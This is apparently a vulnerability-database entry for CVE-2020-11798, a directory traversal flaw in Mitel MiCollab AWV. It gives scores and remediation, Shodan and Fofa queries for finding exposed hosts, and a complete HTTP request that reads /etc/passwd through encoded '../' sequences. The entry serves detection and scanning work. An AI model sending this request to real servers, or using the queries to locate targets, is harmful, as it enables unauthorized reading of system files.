🔙 목록으로 돌아가기

CVE-2020-11798: Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal

TitleMitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal
Authorritikchaddha
SeverityMedium
ImpactAn attacker can exploit this vulnerability to view, modify, or delete arbitrary files on the system, potentially leading to unauthorized access or data leakage.
RemediationApply the latest security patches or updates provided by Mitel to mitigate the vulnerability and prevent unauthorized access.
CVSS Score5.3
EPSS Score0.85152
CVE IDCVE-2020-11798
CWE IDCWE-22
Shodan Queryhtml:"Mitel" html:"MiCollab"http.html:"mitel" html:"micollab"
Fofa Querybody="mitel" html:"micollab"
Tags cve cve2020 packetstorm mitel micollab lfi vkev vuln

🔍 Vulnerability Description

A Directory Traversal vulnerability in the web conference component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an attacker to access arbitrary files from restricted directories of the server via a crafted URL, due to insufficient access validation. A successful exploit could allow an attacker to access sensitive information from the restricted directories.

🌐 HTTP Request

GET /awcuser/cgi-bin/vcs_access_file.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-11798.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-11798.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A